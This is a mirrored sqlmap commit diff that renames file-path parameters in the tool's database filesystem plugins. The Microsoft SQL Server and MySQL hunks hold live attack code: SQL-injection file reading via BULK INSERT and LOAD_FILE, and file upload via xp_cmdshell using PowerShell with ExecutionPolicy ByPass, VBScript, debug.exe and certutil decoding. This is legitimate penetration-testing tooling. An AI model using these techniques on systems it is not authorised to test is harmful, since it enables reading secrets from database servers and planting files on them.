mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-22 09:36:35 +03:00
Some renaming (pylint stuff)
This commit is contained in:
parent
e236ba5616
commit
b3cdec547b
|
@ -343,7 +343,7 @@ def checkSqlInjection(place, parameter, value):
|
||||||
msg += "only basic UNION tests if there is not "
|
msg += "only basic UNION tests if there is not "
|
||||||
msg += "at least one other (potential) "
|
msg += "at least one other (potential) "
|
||||||
msg += "technique found. Do you want to reduce "
|
msg += "technique found. Do you want to reduce "
|
||||||
msg +="the number of requests? [Y/n] "
|
msg += "the number of requests? [Y/n] "
|
||||||
kb.futileUnion = readInput(msg, default='Y', boolean=True)
|
kb.futileUnion = readInput(msg, default='Y', boolean=True)
|
||||||
|
|
||||||
if kb.futileUnion and int(_) > 10:
|
if kb.futileUnion and int(_) > 10:
|
||||||
|
|
|
@ -18,7 +18,7 @@ from lib.core.enums import OS
|
||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.3.6.5"
|
VERSION = "1.3.6.6"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|
|
@ -23,7 +23,7 @@ class Enumeration(GenericEnumeration):
|
||||||
warnMsg = "on Microsoft Access it is not possible to get name of the current database"
|
warnMsg = "on Microsoft Access it is not possible to get name of the current database"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
def isDba(self, *args, **kwargs):
|
def isDba(self, user=None):
|
||||||
warnMsg = "on Microsoft Access it is not possible to test if current user is DBA"
|
warnMsg = "on Microsoft Access it is not possible to test if current user is DBA"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
|
|
@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "on Microsoft Access it is not possible to read files"
|
errMsg = "on Microsoft Access it is not possible to read files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "on Microsoft Access it is not possible to write files"
|
errMsg = "on Microsoft Access it is not possible to write files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "on Firebird it is not possible to read files"
|
errMsg = "on Firebird it is not possible to read files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "on Firebird it is not possible to write files"
|
errMsg = "on Firebird it is not possible to write files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "on H2 it is not possible to read files"
|
errMsg = "on H2 it is not possible to read files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "on H2 it is not possible to write files"
|
errMsg = "on H2 it is not possible to write files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "on HSQLDB it is not possible to read files"
|
errMsg = "on HSQLDB it is not possible to read files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "on HSQLDB it is not possible to write files"
|
errMsg = "on HSQLDB it is not possible to write files"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
|
||||||
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
from plugins.generic.filesystem import Filesystem as GenericFilesystem
|
||||||
|
|
||||||
class Filesystem(GenericFilesystem):
|
class Filesystem(GenericFilesystem):
|
||||||
def readFile(self, rFile):
|
def readFile(self, remoteFile):
|
||||||
errMsg = "on SAP MaxDB reading of files is not supported"
|
errMsg = "on SAP MaxDB reading of files is not supported"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
|
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
errMsg = "on SAP MaxDB writing of files is not supported"
|
errMsg = "on SAP MaxDB writing of files is not supported"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
|
@ -81,8 +81,8 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
return chunkName
|
return chunkName
|
||||||
|
|
||||||
def stackedReadFile(self, rFile):
|
def stackedReadFile(self, remoteFile):
|
||||||
infoMsg = "fetching file: '%s'" % rFile
|
infoMsg = "fetching file: '%s'" % remoteFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
result = []
|
result = []
|
||||||
|
@ -93,8 +93,8 @@ class Filesystem(GenericFilesystem):
|
||||||
inject.goStacked("DROP TABLE %s" % hexTbl)
|
inject.goStacked("DROP TABLE %s" % hexTbl)
|
||||||
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
|
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
|
||||||
|
|
||||||
logger.debug("loading the content of file '%s' into support table" % rFile)
|
logger.debug("loading the content of file '%s' into support table" % remoteFile)
|
||||||
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)
|
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True)
|
||||||
|
|
||||||
# Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829
|
# Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829
|
||||||
binToHexQuery = """DECLARE @charset VARCHAR(16)
|
binToHexQuery = """DECLARE @charset VARCHAR(16)
|
||||||
|
@ -147,7 +147,7 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
if not isNumPosStrValue(count):
|
if not isNumPosStrValue(count):
|
||||||
errMsg = "unable to retrieve the content of the "
|
errMsg = "unable to retrieve the content of the "
|
||||||
errMsg += "file '%s'" % rFile
|
errMsg += "file '%s'" % remoteFile
|
||||||
raise SqlmapNoneDataException(errMsg)
|
raise SqlmapNoneDataException(errMsg)
|
||||||
|
|
||||||
indexRange = getLimitRange(count)
|
indexRange = getLimitRange(count)
|
||||||
|
@ -160,41 +160,41 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
return result
|
return result
|
||||||
|
|
||||||
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
|
||||||
errMsg = "Microsoft SQL Server does not support file upload with "
|
errMsg = "Microsoft SQL Server does not support file upload with "
|
||||||
errMsg += "UNION query SQL injection technique"
|
errMsg += "UNION query SQL injection technique"
|
||||||
raise SqlmapUnsupportedFeatureException(errMsg)
|
raise SqlmapUnsupportedFeatureException(errMsg)
|
||||||
|
|
||||||
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType):
|
def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
|
||||||
infoMsg = "using PowerShell to write the %s file content " % fileType
|
infoMsg = "using PowerShell to write the %s file content " % fileType
|
||||||
infoMsg += "to file '%s'" % dFile
|
infoMsg += "to file '%s'" % remoteFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
encodedFileContent = encodeBase64(wFileContent, binary=False)
|
encodedFileContent = encodeBase64(localFileContent, binary=False)
|
||||||
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
|
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
|
||||||
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
|
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
|
||||||
|
|
||||||
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
|
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
|
||||||
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
|
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
|
||||||
|
|
||||||
wFileSize = len(encodedFileContent)
|
localFileSize = len(encodedFileContent)
|
||||||
chunkMaxSize = 1024
|
chunkMaxSize = 1024
|
||||||
|
|
||||||
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
|
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
|
||||||
|
|
||||||
for i in xrange(0, wFileSize, chunkMaxSize):
|
for i in xrange(0, localFileSize, chunkMaxSize):
|
||||||
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
|
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
|
||||||
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
|
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
|
||||||
|
|
||||||
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
|
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
|
||||||
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
|
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
|
||||||
psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
|
psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
|
||||||
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile
|
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
|
||||||
|
|
||||||
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
|
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
|
||||||
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
|
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
|
||||||
|
|
||||||
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile)
|
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
|
||||||
|
|
||||||
commands = (
|
commands = (
|
||||||
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
|
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
|
||||||
|
@ -204,27 +204,27 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
self.execCmd(" & ".join(command for command in commands))
|
self.execCmd(" & ".join(command for command in commands))
|
||||||
|
|
||||||
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
|
def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
|
||||||
infoMsg = "using debug.exe to write the %s " % fileType
|
infoMsg = "using debug.exe to write the %s " % fileType
|
||||||
infoMsg += "file content to file '%s', please wait.." % dFile
|
infoMsg += "file content to file '%s', please wait.." % remoteFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
dFileName = ntpath.basename(dFile)
|
remoteFileName = ntpath.basename(remoteFile)
|
||||||
sFile = "%s\\%s" % (tmpPath, dFileName)
|
sFile = "%s\\%s" % (tmpPath, remoteFileName)
|
||||||
wFileSize = os.path.getsize(wFile)
|
localFileSize = os.path.getsize(localFile)
|
||||||
debugSize = 0xFF00
|
debugSize = 0xFF00
|
||||||
|
|
||||||
if wFileSize < debugSize:
|
if localFileSize < debugSize:
|
||||||
chunkName = self._updateDestChunk(wFileContent, tmpPath)
|
chunkName = self._updateDestChunk(localFileContent, tmpPath)
|
||||||
|
|
||||||
debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
|
debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
|
||||||
debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile)
|
debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
commands = (
|
commands = (
|
||||||
"cd \"%s\"" % tmpPath,
|
"cd \"%s\"" % tmpPath,
|
||||||
"ren %s %s" % (chunkName, dFileName),
|
"ren %s %s" % (chunkName, remoteFileName),
|
||||||
"move /Y %s %s" % (dFileName, dFile)
|
"move /Y %s %s" % (remoteFileName, remoteFile)
|
||||||
)
|
)
|
||||||
|
|
||||||
self.execCmd(" & ".join(command for command in commands))
|
self.execCmd(" & ".join(command for command in commands))
|
||||||
|
@ -235,18 +235,18 @@ class Filesystem(GenericFilesystem):
|
||||||
debugMsg += "on the server, please wait.."
|
debugMsg += "on the server, please wait.."
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
for i in xrange(0, wFileSize, debugSize):
|
for i in xrange(0, localFileSize, debugSize):
|
||||||
wFileChunk = wFileContent[i:i + debugSize]
|
localFileChunk = localFileContent[i:i + debugSize]
|
||||||
chunkName = self._updateDestChunk(wFileChunk, tmpPath)
|
chunkName = self._updateDestChunk(localFileChunk, tmpPath)
|
||||||
|
|
||||||
if i == 0:
|
if i == 0:
|
||||||
debugMsg = "renaming chunk "
|
debugMsg = "renaming chunk "
|
||||||
copyCmd = "ren %s %s" % (chunkName, dFileName)
|
copyCmd = "ren %s %s" % (chunkName, remoteFileName)
|
||||||
else:
|
else:
|
||||||
debugMsg = "appending chunk "
|
debugMsg = "appending chunk "
|
||||||
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)
|
copyCmd = "copy /B /Y %s+%s %s" % (remoteFileName, chunkName, remoteFileName)
|
||||||
|
|
||||||
debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName)
|
debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
commands = (
|
commands = (
|
||||||
|
@ -257,18 +257,18 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
self.execCmd(" & ".join(command for command in commands))
|
self.execCmd(" & ".join(command for command in commands))
|
||||||
|
|
||||||
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile))
|
logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
|
||||||
|
|
||||||
commands = (
|
commands = (
|
||||||
"cd \"%s\"" % tmpPath,
|
"cd \"%s\"" % tmpPath,
|
||||||
"move /Y %s %s" % (dFileName, dFile)
|
"move /Y %s %s" % (remoteFileName, remoteFile)
|
||||||
)
|
)
|
||||||
|
|
||||||
self.execCmd(" & ".join(command for command in commands))
|
self.execCmd(" & ".join(command for command in commands))
|
||||||
|
|
||||||
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType):
|
def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
|
||||||
infoMsg = "using a custom visual basic script to write the "
|
infoMsg = "using a custom visual basic script to write the "
|
||||||
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile)
|
infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
|
randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
|
||||||
|
@ -327,10 +327,10 @@ class Filesystem(GenericFilesystem):
|
||||||
Else
|
Else
|
||||||
mimedecode = InStr(Base64Chars, strIn) - 1
|
mimedecode = InStr(Base64Chars, strIn) - 1
|
||||||
End If
|
End If
|
||||||
End Function""" % (randFilePath, dFile)
|
End Function""" % (randFilePath, remoteFile)
|
||||||
|
|
||||||
vbs = vbs.replace(" ", "")
|
vbs = vbs.replace(" ", "")
|
||||||
encodedFileContent = encodeBase64(wFileContent, binary=False)
|
encodedFileContent = encodeBase64(localFileContent, binary=False)
|
||||||
|
|
||||||
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
|
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
|
||||||
|
|
||||||
|
@ -349,9 +349,9 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
self.execCmd(" & ".join(command for command in commands))
|
self.execCmd(" & ".join(command for command in commands))
|
||||||
|
|
||||||
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType):
|
def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
|
||||||
infoMsg = "using certutil.exe to write the %s " % fileType
|
infoMsg = "using certutil.exe to write the %s " % fileType
|
||||||
infoMsg += "file content to file '%s', please wait.." % dFile
|
infoMsg += "file content to file '%s', please wait.." % remoteFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
chunkMaxSize = 500
|
chunkMaxSize = 500
|
||||||
|
@ -359,7 +359,7 @@ class Filesystem(GenericFilesystem):
|
||||||
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
|
randFile = "tmpf%s.txt" % randomStr(lowercase=True)
|
||||||
randFilePath = "%s\\%s" % (tmpPath, randFile)
|
randFilePath = "%s\\%s" % (tmpPath, randFile)
|
||||||
|
|
||||||
encodedFileContent = encodeBase64(wFileContent, binary=False)
|
encodedFileContent = encodeBase64(localFileContent, binary=False)
|
||||||
|
|
||||||
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
|
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
|
||||||
|
|
||||||
|
@ -367,17 +367,17 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
|
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
|
||||||
|
|
||||||
logger.debug("decoding the file to %s.." % dFile)
|
logger.debug("decoding the file to %s.." % remoteFile)
|
||||||
|
|
||||||
commands = (
|
commands = (
|
||||||
"cd \"%s\"" % tmpPath,
|
"cd \"%s\"" % tmpPath,
|
||||||
"certutil -f -decode %s %s" % (randFile, dFile),
|
"certutil -f -decode %s %s" % (randFile, remoteFile),
|
||||||
"del /F /Q %s" % randFile
|
"del /F /Q %s" % randFile
|
||||||
)
|
)
|
||||||
|
|
||||||
self.execCmd(" & ".join(command for command in commands))
|
self.execCmd(" & ".join(command for command in commands))
|
||||||
|
|
||||||
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
|
||||||
# NOTE: this is needed here because we use xp_cmdshell extended
|
# NOTE: this is needed here because we use xp_cmdshell extended
|
||||||
# procedure to write a file on the back-end Microsoft SQL Server
|
# procedure to write a file on the back-end Microsoft SQL Server
|
||||||
# file system
|
# file system
|
||||||
|
@ -386,35 +386,35 @@ class Filesystem(GenericFilesystem):
|
||||||
self.getRemoteTempPath()
|
self.getRemoteTempPath()
|
||||||
|
|
||||||
tmpPath = posixToNtSlashes(conf.tmpPath)
|
tmpPath = posixToNtSlashes(conf.tmpPath)
|
||||||
dFile = posixToNtSlashes(dFile)
|
remoteFile = posixToNtSlashes(remoteFile)
|
||||||
with open(wFile, "rb") as f:
|
with open(localFile, "rb") as f:
|
||||||
wFileContent = f.read()
|
localFileContent = f.read()
|
||||||
|
|
||||||
self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType)
|
self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType)
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
||||||
if written is False:
|
if written is False:
|
||||||
message = "do you want to try to upload the file with "
|
message = "do you want to try to upload the file with "
|
||||||
message += "the custom Visual Basic script technique? [Y/n] "
|
message += "the custom Visual Basic script technique? [Y/n] "
|
||||||
|
|
||||||
if readInput(message, default='Y', boolean=True):
|
if readInput(message, default='Y', boolean=True):
|
||||||
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType)
|
self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
||||||
if written is False:
|
if written is False:
|
||||||
message = "do you want to try to upload the file with "
|
message = "do you want to try to upload the file with "
|
||||||
message += "the built-in debug.exe technique? [Y/n] "
|
message += "the built-in debug.exe technique? [Y/n] "
|
||||||
|
|
||||||
if readInput(message, default='Y', boolean=True):
|
if readInput(message, default='Y', boolean=True):
|
||||||
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
||||||
if written is False:
|
if written is False:
|
||||||
message = "do you want to try to upload the file with "
|
message = "do you want to try to upload the file with "
|
||||||
message += "the built-in certutil.exe technique? [Y/n] "
|
message += "the built-in certutil.exe technique? [Y/n] "
|
||||||
|
|
||||||
if readInput(message, default='Y', boolean=True):
|
if readInput(message, default='Y', boolean=True):
|
||||||
self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType)
|
self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
|
||||||
written = self.askCheckWrittenFile(wFile, dFile, forceCheck)
|
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
|
||||||
|
|
||||||
return written
|
return written
|
||||||
|
|
|
@ -38,8 +38,8 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
return result
|
return result
|
||||||
|
|
||||||
def stackedReadFile(self, rFile):
|
def stackedReadFile(self, remoteFile):
|
||||||
infoMsg = "fetching file: '%s'" % rFile
|
infoMsg = "fetching file: '%s'" % remoteFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
|
self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
|
||||||
|
@ -47,13 +47,13 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))
|
tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))
|
||||||
|
|
||||||
debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile
|
debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile
|
||||||
debugMsg += "into temporary file '%s'" % tmpFile
|
debugMsg += "into temporary file '%s'" % tmpFile
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile))
|
inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile))
|
||||||
|
|
||||||
debugMsg = "loading the content of hexadecimal encoded file "
|
debugMsg = "loading the content of hexadecimal encoded file "
|
||||||
debugMsg += "'%s' into support table" % rFile
|
debugMsg += "'%s' into support table" % remoteFile
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))
|
inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))
|
||||||
|
|
||||||
|
@ -61,12 +61,12 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
if not isNumPosStrValue(length):
|
if not isNumPosStrValue(length):
|
||||||
warnMsg = "unable to retrieve the content of the "
|
warnMsg = "unable to retrieve the content of the "
|
||||||
warnMsg += "file '%s'" % rFile
|
warnMsg += "file '%s'" % remoteFile
|
||||||
|
|
||||||
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
|
||||||
warnMsg += ", going to fall-back to simpler UNION technique"
|
warnMsg += ", going to fall-back to simpler UNION technique"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
result = self.nonStackedReadFile(rFile)
|
result = self.nonStackedReadFile(remoteFile)
|
||||||
else:
|
else:
|
||||||
raise SqlmapNoneDataException(warnMsg)
|
raise SqlmapNoneDataException(warnMsg)
|
||||||
else:
|
else:
|
||||||
|
@ -85,10 +85,10 @@ class Filesystem(GenericFilesystem):
|
||||||
return result
|
return result
|
||||||
|
|
||||||
@stackedmethod
|
@stackedmethod
|
||||||
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False):
|
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
|
||||||
logger.debug("encoding file to its hexadecimal string value")
|
logger.debug("encoding file to its hexadecimal string value")
|
||||||
|
|
||||||
fcEncodedList = self.fileEncode(wFile, "hex", True)
|
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
||||||
fcEncodedStr = fcEncodedList[0]
|
fcEncodedStr = fcEncodedList[0]
|
||||||
fcEncodedStrLen = len(fcEncodedStr)
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
|
@ -99,12 +99,12 @@ class Filesystem(GenericFilesystem):
|
||||||
warnMsg += "writing process"
|
warnMsg += "writing process"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile)
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
||||||
logger.debug(debugMsg)
|
